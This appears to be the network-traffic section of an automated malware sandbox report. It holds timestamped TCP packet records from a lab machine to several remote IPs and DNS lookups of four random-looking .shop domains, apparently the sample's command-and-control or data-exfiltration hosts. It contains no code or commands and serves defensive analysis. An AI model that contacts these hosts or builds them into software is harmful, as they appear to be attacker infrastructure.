Jan 15, 2025 17:25:01.846607924 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.846641064 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.846666098 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.847366095 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.847414017 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.847457886 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.847471952 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.847507000 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.847534895 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.847556114 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.847596884 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.847625971 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.847639084 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.847667933 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.847690105 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.847959042 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.848001003 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.848045111 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.848057985 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.848088026 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.848114014 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.871121883 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.871166945 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.871315956 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.871315956 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.871349096 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.871412039 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.871638060 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.871695995 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.871726990 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.871736050 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.871767044 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.871793032 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.936873913 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.936930895 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.937007904 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.937077999 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.937119961 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.937123060 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.937141895 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.937158108 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.937196970 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.937211990 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.937225103 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.937239885 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.937278032 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.937308073 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.937393904 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.937444925 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.937474012 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.937488079 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.937532902 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.937534094 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.937968969 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.938013077 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.938052893 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.938066006 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.938097954 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.938118935 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.938224077 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.938266993 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.938297987 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.938311100 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.938338041 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.938381910 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.938551903 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.938595057 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.938622952 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.938636065 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.938667059 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.938688040 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.938703060 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.961575031 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.961697102 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.961781025 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.961781979 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.961852074 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.962744951 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.962793112 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.962817907 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:01.962836981 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:01.962867975 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:02.008701086 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:02.028062105 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:02.028110981 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:02.028171062 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:02.028244972 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:02.028280973 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:02.028285980 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:02.028314114 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:02.028333902 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:02.028346062 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:02.028363943 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:02.028414011 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:02.028450966 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:02.028476000 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:02.028526068 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:02.028551102 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:02.028570890 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:02.028628111 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:02.028650999 CET	443	49730	104.21.78.33	192.168.2.4
Jan 15, 2025 17:25:02.028712988 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:02.036145926 CET	49730	443	192.168.2.4	104.21.78.33
Jan 15, 2025 17:25:03.078308105 CET	49731	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:03.078419924 CET	443	49731	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:03.078504086 CET	49731	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:03.080287933 CET	49731	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:03.080324888 CET	443	49731	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:03.578104973 CET	443	49731	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:03.578268051 CET	49731	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:03.580774069 CET	49731	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:03.580804110 CET	443	49731	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:03.581165075 CET	443	49731	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:03.623682976 CET	49731	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:03.623682976 CET	49731	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:03.623995066 CET	443	49731	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:04.096096039 CET	443	49731	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:04.096329927 CET	443	49731	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:04.096401930 CET	49731	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:04.101082087 CET	49731	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:04.101135015 CET	443	49731	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:04.101166010 CET	49731	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:04.101183891 CET	443	49731	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:04.114686966 CET	49732	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:04.114712000 CET	443	49732	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:04.114770889 CET	49732	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:04.115267038 CET	49732	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:04.115278959 CET	443	49732	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:05.376473904 CET	443	49732	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:05.376550913 CET	49732	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:05.378138065 CET	49732	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:05.378148079 CET	443	49732	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:05.378915071 CET	443	49732	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:05.380192041 CET	49732	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:05.380215883 CET	49732	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:05.380388021 CET	443	49732	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:05.906428099 CET	443	49732	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:05.906563997 CET	443	49732	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:05.906625986 CET	49732	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:05.906642914 CET	443	49732	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:05.906733990 CET	443	49732	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:05.906812906 CET	49732	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:05.906817913 CET	443	49732	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:05.906846046 CET	443	49732	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:05.906900883 CET	49732	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:05.906934023 CET	443	49732	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:05.907092094 CET	443	49732	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:05.907134056 CET	49732	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:05.907144070 CET	443	49732	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:05.907253027 CET	443	49732	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:05.907319069 CET	49732	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:05.907325029 CET	443	49732	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:05.911103964 CET	443	49732	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:05.911190033 CET	49732	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:05.911196947 CET	443	49732	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:05.962543011 CET	49732	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:05.992536068 CET	443	49732	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:05.992671013 CET	443	49732	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:05.992738008 CET	49732	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:05.992755890 CET	443	49732	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:05.992826939 CET	443	49732	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:05.992944956 CET	49732	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:05.992952108 CET	443	49732	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:05.993031025 CET	443	49732	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:05.993077993 CET	49732	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:05.993999004 CET	49732	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:05.993999004 CET	49732	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:05.994021893 CET	443	49732	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:05.994029045 CET	443	49732	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:06.086106062 CET	49733	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:06.086205006 CET	443	49733	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:06.086340904 CET	49733	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:06.086668968 CET	49733	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:06.086704969 CET	443	49733	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:06.606205940 CET	443	49733	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:06.606293917 CET	49733	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:06.607923031 CET	49733	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:06.607930899 CET	443	49733	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:06.608721018 CET	443	49733	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:06.613099098 CET	49733	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:06.613292933 CET	49733	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:06.613343954 CET	443	49733	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:06.613419056 CET	49733	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:06.613426924 CET	443	49733	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:19.211536884 CET	443	49733	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:19.211653948 CET	443	49733	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:19.211766958 CET	49733	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:19.268377066 CET	49733	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:19.268423080 CET	443	49733	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:19.403022051 CET	49738	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:19.403073072 CET	443	49738	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:19.403136969 CET	49738	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:19.403759003 CET	49738	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:19.403776884 CET	443	49738	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:20.057569981 CET	443	49738	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:20.057656050 CET	49738	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:20.059186935 CET	49738	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:20.059217930 CET	443	49738	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:20.060251951 CET	443	49738	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:20.068568945 CET	49738	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:20.068680048 CET	49738	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:20.068747044 CET	443	49738	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:20.557164907 CET	443	49738	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:20.557652950 CET	443	49738	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:20.557713985 CET	49738	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:20.557789087 CET	49738	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:20.557826996 CET	443	49738	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:20.623111963 CET	49741	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:20.623137951 CET	443	49741	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:20.623217106 CET	49741	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:20.623466969 CET	49741	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:20.623480082 CET	443	49741	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:21.112505913 CET	443	49741	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:21.112576962 CET	49741	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:21.114259958 CET	49741	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:21.114270926 CET	443	49741	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:21.115123987 CET	443	49741	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:21.116241932 CET	49741	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:21.116377115 CET	49741	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:21.116413116 CET	443	49741	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:21.116472006 CET	49741	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:21.116482019 CET	443	49741	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:21.864111900 CET	443	49741	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:21.864206076 CET	443	49741	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:21.864259958 CET	49741	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:21.864443064 CET	49741	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:21.864464045 CET	443	49741	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:22.221546888 CET	49742	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:22.221576929 CET	443	49742	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:22.221704006 CET	49742	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:22.222420931 CET	49742	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:22.222448111 CET	443	49742	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:22.736699104 CET	443	49742	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:22.736821890 CET	49742	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:22.738012075 CET	49742	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:22.738039970 CET	443	49742	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:22.738385916 CET	443	49742	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:22.747051001 CET	49742	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:22.747160912 CET	49742	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:22.747173071 CET	443	49742	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:23.091708899 CET	443	49742	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:23.091973066 CET	443	49742	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:23.092089891 CET	49742	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:23.092178106 CET	49742	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:23.092216015 CET	443	49742	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:23.176582098 CET	49743	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:23.176629066 CET	443	49743	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:23.176770926 CET	49743	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:23.177047014 CET	49743	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:23.177062035 CET	443	49743	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:23.654134035 CET	443	49743	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:23.654242992 CET	49743	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:23.657423973 CET	49743	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:23.657439947 CET	443	49743	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:23.657783985 CET	443	49743	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:23.661093950 CET	49743	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:23.661179066 CET	49743	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:23.661191940 CET	443	49743	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:24.337050915 CET	443	49743	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:24.337136984 CET	443	49743	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:24.337292910 CET	49743	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:24.337330103 CET	49743	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:24.337351084 CET	443	49743	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:24.341335058 CET	49744	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:24.341424942 CET	443	49744	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:24.341519117 CET	49744	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:24.341804028 CET	49744	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:24.341846943 CET	443	49744	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:24.829979897 CET	443	49744	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:24.830182076 CET	49744	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:24.831861973 CET	49744	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:24.831919909 CET	443	49744	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:24.832359076 CET	443	49744	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:24.833873034 CET	49744	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:24.833956003 CET	49744	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:24.834022045 CET	443	49744	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:25.294630051 CET	443	49744	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:25.294759989 CET	443	49744	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:25.294828892 CET	49744	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:25.295006037 CET	49744	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:25.295052052 CET	443	49744	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:25.295082092 CET	49744	443	192.168.2.4	104.21.67.165
Jan 15, 2025 17:25:25.295098066 CET	443	49744	104.21.67.165	192.168.2.4
Jan 15, 2025 17:25:25.403376102 CET	49745	443	192.168.2.4	185.161.251.21
Jan 15, 2025 17:25:25.403429031 CET	443	49745	185.161.251.21	192.168.2.4
Jan 15, 2025 17:25:25.403516054 CET	49745	443	192.168.2.4	185.161.251.21
Jan 15, 2025 17:25:25.403937101 CET	49745	443	192.168.2.4	185.161.251.21
Jan 15, 2025 17:25:25.403954029 CET	443	49745	185.161.251.21	192.168.2.4
Jan 15, 2025 17:25:26.246453047 CET	443	49745	185.161.251.21	192.168.2.4
Jan 15, 2025 17:25:26.246542931 CET	49745	443	192.168.2.4	185.161.251.21
Jan 15, 2025 17:25:26.248708963 CET	49745	443	192.168.2.4	185.161.251.21
Jan 15, 2025 17:25:26.248714924 CET	443	49745	185.161.251.21	192.168.2.4
Jan 15, 2025 17:25:26.249032021 CET	443	49745	185.161.251.21	192.168.2.4
Jan 15, 2025 17:25:26.250164032 CET	49745	443	192.168.2.4	185.161.251.21
Jan 15, 2025 17:25:26.291327000 CET	443	49745	185.161.251.21	192.168.2.4
Jan 15, 2025 17:25:26.523763895 CET	443	49745	185.161.251.21	192.168.2.4
Jan 15, 2025 17:25:26.523845911 CET	443	49745	185.161.251.21	192.168.2.4
Jan 15, 2025 17:25:26.523895025 CET	49745	443	192.168.2.4	185.161.251.21
Jan 15, 2025 17:25:26.524013996 CET	49745	443	192.168.2.4	185.161.251.21
Jan 15, 2025 17:25:26.524038076 CET	443	49745	185.161.251.21	192.168.2.4
Jan 15, 2025 17:25:26.524055004 CET	49745	443	192.168.2.4	185.161.251.21
Jan 15, 2025 17:25:26.524060011 CET	443	49745	185.161.251.21	192.168.2.4
Jan 15, 2025 17:25:26.575788975 CET	49746	443	192.168.2.4	104.21.15.122
Jan 15, 2025 17:25:26.575875998 CET	443	49746	104.21.15.122	192.168.2.4
Jan 15, 2025 17:25:26.575975895 CET	49746	443	192.168.2.4	104.21.15.122
Jan 15, 2025 17:25:26.576225996 CET	49746	443	192.168.2.4	104.21.15.122
Jan 15, 2025 17:25:26.576267004 CET	443	49746	104.21.15.122	192.168.2.4
Jan 15, 2025 17:25:27.030689955 CET	49746	443	192.168.2.4	104.21.15.122

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 17:25:00.062819958 CET	55927	53	192.168.2.4	1.1.1.1
Jan 15, 2025 17:25:00.071429968 CET	53	55927	1.1.1.1	192.168.2.4
Jan 15, 2025 17:25:03.053978920 CET	49947	53	192.168.2.4	1.1.1.1
Jan 15, 2025 17:25:03.072297096 CET	53	49947	1.1.1.1	192.168.2.4
Jan 15, 2025 17:25:25.296936989 CET	51897	53	192.168.2.4	1.1.1.1
Jan 15, 2025 17:25:25.402344942 CET	53	51897	1.1.1.1	192.168.2.4
Jan 15, 2025 17:25:26.563440084 CET	57949	53	192.168.2.4	1.1.1.1
Jan 15, 2025 17:25:26.575167894 CET	53	57949	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 15, 2025 17:25:00.062819958 CET	192.168.2.4	1.1.1.1	0xbdc7	Standard query (0)	u1.grapplereturnunstamped.shop	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:25:03.053978920 CET	192.168.2.4	1.1.1.1	0xd440	Standard query (0)	burnressert.shop	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:25:25.296936989 CET	192.168.2.4	1.1.1.1	0x19a	Standard query (0)	cegu.shop	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:25:26.563440084 CET	192.168.2.4	1.1.1.1	0x6dd2	Standard query (0)	klipgonuh.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 15, 2025 17:25:00.071429968 CET	1.1.1.1	192.168.2.4	0xbdc7	No error (0)	u1.grapplereturnunstamped.shop	104.21.78.33	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:25:00.071429968 CET	1.1.1.1	192.168.2.4	0xbdc7	No error (0)	u1.grapplereturnunstamped.shop	172.67.215.98	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:25:03.072297096 CET	1.1.1.1	192.168.2.4	0xd440	No error (0)	burnressert.shop	104.21.67.165	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:25:03.072297096 CET	1.1.1.1	192.168.2.4	0xd440	No error (0)	burnressert.shop	172.67.178.124	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:25:25.402344942 CET	1.1.1.1	192.168.2.4	0x19a	No error (0)	cegu.shop	185.161.251.21	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:25:26.575167894 CET	1.1.1.1	192.168.2.4	0x6dd2	No error (0)	klipgonuh.shop	104.21.15.122	A (IP address)	IN (0x0001)	false
Jan 15, 2025 17:25:26.575167894 CET	1.1.1.1	192.168.2.4	0x6dd2	No error (0)	klipgonuh.shop	172.67.162.153	A (IP address)	IN (0x0001)	false

